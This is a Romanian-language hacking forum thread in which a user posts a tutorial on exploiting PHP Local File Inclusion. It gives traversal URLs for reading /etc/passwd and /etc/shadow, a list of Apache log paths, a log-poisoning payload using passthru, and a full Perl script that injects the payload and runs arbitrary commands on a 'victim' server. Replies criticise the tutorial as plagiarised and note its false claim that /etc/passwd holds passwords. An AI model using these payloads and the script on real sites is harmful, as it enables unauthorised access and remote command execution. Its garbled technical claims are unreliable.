Castiel Posted December 8, 2013 Report Posted December 8, 2013 Salut , rst! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.Mai intai, sa vedem acest mic cod php:$page = $_GET[/page][page];include($page);?><?phpAcesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:site.host/index.php?page=../../../../../../../etc/passwdDaca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata, ar trebui sa arate cam asa:username:x:503:100:FullName:/home/username:/bin/shIn acest exemplu, parola este x, alt exemplu de parola fiind:username:!:503:100:FullName:/home/username:/bin/shAlte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi:/etc/group/etc/security/group/etc/security/passwd/etc/security/user/etc/security/environ/etc/security/limits/etc/shadowIn caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii , serverul va omite tot ce scrie dupa .Exemplu de cod:site.host/index.php?file=../../../../../../../../etc/passwdAcum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.Cateva adrese de loguri:../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log../../../../../../../etc/httpd/logs/acces_log../../../../../../../etc/httpd/logs/acces.log../../../../../../../etc/httpd/logs/error_log../../../../../../../etc/httpd/logs/error.log../../../../../../../var/www/logs/access_log../../../../../../../var/www/logs/access.log../../../../../../../usr/local/apache/logs/access_log../../../../../../../usr/local/apache/logs/access.log../../../../../../../var/log/apache/access_log../../../../../../../var/log/apache2/access_log../../../../../../../var/log/apache/access.log../../../../../../../var/log/apache2/access.log../../../../../../../var/log/access_log../../../../../../../var/log/access.log../../../../../../../var/www/logs/error_log../../../../../../../var/www/logs/error.log../../../../../../../usr/local/apache/logs/error_log../../../../../../../usr/local/apache/logs/error.log../../../../../../../var/log/apache/error_log../../../../../../../var/log/apache2/error_log../../../../../../../var/log/apache/error.log../../../../../../../var/log/apache2/error.log../../../../../../../var/log/error_log../../../../../../../var/log/error.log../apache/logs/error.logOk, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser:site.host/<? passthru(\$_GET[cmd]) ?>O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in:site.host/<? passthru(\$_GET[cmd]) ?>Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl:use IO::Socket;use LWP::UserAgent;$site="victim.com";$path="/folder/";$code="<? passthru(\$_GET[cmd]) ?>";$log = "../../../../../../../etc/httpd/logs/error_log";print "Trying to inject the code";$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";print $socket "GET ".$path.$code." HTTP/1.1\r\n";print $socket "User-Agent: ".$code."\r\n";print $socket "Host: ".$site."\r\n";print $socket "Connection: close\r\n\r\n";close($socket);print "\nCode $code sucssefully injected in $log \n";print "\nType command to run or exit to end: ";$cmd = <STDIN>;while($cmd !~ "exit") {$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($show = <$socket>) { print $show; }print "Type command to run or exit to end: ";$cmd = <STDIN>;}#!/usr/bin/perl -w Quote
SilenTx0 Posted December 8, 2013 Report Posted December 8, 2013 Sursa? Sau ai impresia ca daca schimbi unul maxim doua cuvinte e facut de tine tutorialul?Rusine! Quote
Active Members dancezar Posted December 8, 2013 Active Members Report Posted December 8, 2013 cam auirea scris "unde puteti gasi parolele in afara de /etc/passwd ar cam fi:" etc/passwd nu are parole .apoi ai uitat sa spui de null byte %00 cand scriptul iti pune .php la urma .Si unde is metodele php://input si php://filter ? Quote
Castiel Posted December 8, 2013 Author Report Posted December 8, 2013 Am spus eu ca este facut de mine:))? Este dupa pro-area eu doar am modificat unele greselii . Quote
Castiel Posted December 8, 2013 Author Report Posted December 8, 2013 askwrite aveai nevoie de +1 ? ON : LFI - Local File Inclusion Quote
SilenTx0 Posted December 8, 2013 Report Posted December 8, 2013 Din moment ce nu ai postat sursa, se intelege ca e facut de tine:) nu e nevoie sa mai mentionezi asta. Quote
aelius Posted December 8, 2013 Report Posted December 8, 2013 (edited) Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile.Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.O parola criptata, ar trebui sa arate cam asa: username:x:503:100:FullName:/home/username:/bin/shAu, muma ... Edited December 8, 2013 by aelius Quote
Active Members akkiliON Posted December 8, 2013 Active Members Report Posted December 8, 2013 Au, muma ... Quote
